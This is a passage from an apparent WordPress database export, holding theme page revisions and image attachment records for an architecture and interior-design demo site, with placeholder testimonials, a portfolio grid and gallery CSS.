<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-30 08:32:31','2023-05-30 08:32:31','',22,'https://bauhaus.futuremediatrix.com/?p=4799',0,'revision','',0),(4800,2,'2023-05-30 08:40:38','2023-05-30 08:40:38','','Office-1','','inherit','open','closed','','office-1','','','2023-05-30 08:40:38','2023-05-30 08:40:38','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/Office-1.jpg',0,'attachment','image/jpeg',0),(4801,2,'2023-05-30 08:40:48','2023-05-30 08:40:48','','office-2','','inherit','open','closed','','office-2','','','2023-05-30 08:40:48','2023-05-30 08:40:48','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-2.jpg',0,'attachment','image/jpeg',0),(4803,2,'2023-05-30 08:40:58','2023-05-30 08:40:58','','office-3','','inherit','open','closed','','office-3','','','2023-05-30 08:40:58','2023-05-30 08:40:58','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-3.jpg',0,'attachment','image/jpeg',0),(4804,2,'2023-05-30 08:41:09','2023-05-30 08:41:09','','office-4','','inherit','open','closed','','office-4','','','2023-05-30 08:41:09','2023-05-30 08:41:09','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-4.jpg',0,'attachment','image/jpeg',0),(4805,2,'2023-05-30 08:41:12','2023-05-30 08:41:12','','office-5','','inherit','open','closed','','office-5','','','2023-05-30 08:41:12','2023-05-30 08:41:12','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-5.jpg',0,'attachment','image/jpeg',0),(4806,2,'2023-05-30 08:41:15','2023-05-30 08:41:15','','office-6','','inherit','open','closed','','office-6','','','2023-05-30 08:41:15','2023-05-30 08:41:15','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-6.jpg',0,'attachment','image/jpeg',0),(4807,2,'2023-05-30 08:41:16','2023-05-30 08:41:16','','office-7','','inherit','open','closed','','office-7','','','2023-05-30 08:41:16','2023-05-30 08:41:16','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-7.jpg',0,'attachment','image/jpeg',0),(4808,2,'2023-05-30 08:41:19','2023-05-30 08:41:19','','office-8','','inherit','open','closed','','office-8','','','2023-05-30 08:41:19','2023-05-30 08:41:19','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-8.jpeg',0,'attachment','image/jpeg',0),(4809,2,'2023-05-30 08:46:21','2023-05-30 08:46:21','<h3>our recent work</h3>\n<h2>\n								 Introducing outstanding projects</h2>\n<ul>\n 	<li data-filter=\"*\">\n                    All</li>\n 	<li data-slug=\".architect\">\n                    Architect</li>\n 	<li data-slug=\".design\">\n                    Design</li>\n 	<li data-slug=\".interior\">\n                    Interior</li>\n</ul>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\">\nGreater commercial\n</a></h3>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\">\nCozy living room\n</a></h3>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\">\nRichard Rogers\n</a></h3>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson-390x473.jpg\" alt=\"Philip Johnson\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\">\nPhilip Johnson\n</a></h3>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic-390x473.jpg\" alt=\"Domestic\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\">\nDomestic\n</a></h3>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings-390x473.jpg\" alt=\"Buildings\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\">\nBuildings\n</a></h3>\n<h4>no data</h4>','Office','','inherit','closed','closed','','4759-revision-v1','','','2023-05-30 08:46:21','2023-05-30 08:46:21','',4759,'https://bauhaus.futuremediatrix.com/?p=4809',0,'revision','',0),(4810,2,'2023-05-30 08:46:21','2023-05-30 08:46:21','<h3>our recent work</h3>\n<h2>\n								 Introducing outstanding projects</h2>\n<ul>\n 	<li data-filter=\"*\">\n                    All</li>\n 	<li data-slug=\".architect\">\n                    Architect</li>\n 	<li data-slug=\".design\">\n                    Design</li>\n 	<li data-slug=\".interior\">\n                    Interior</li>\n</ul>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\">\nGreater commercial\n</a></h3>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\">\nCozy living room\n</a></h3>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\">\nRichard Rogers\n</a></h3>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson-390x473.jpg\" alt=\"Philip Johnson\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\">\nPhilip Johnson\n</a></h3>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic-390x473.jpg\" alt=\"Domestic\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\">\nDomestic\n</a></h3>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings-390x473.jpg\" alt=\"Buildings\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\">\nBuildings\n</a></h3>\n<h4>no data</h4>','Office','','inherit','closed','closed','','4759-revision-v1','','','2023-05-30 08:46:21','2023-05-30 08:46:21','',4759,'https://bauhaus.futuremediatrix.com/?p=4810',0,'revision','',0),(4811,2,'2023-05-30 08:46:21','2023-05-30 08:46:21','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/Office-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"Office-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwMCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL09mZmljZS0xLmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwMSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS0yLmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwMywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS0zLmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-4.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-4\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS00LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-5.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-5\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS01LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-6.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-6\" 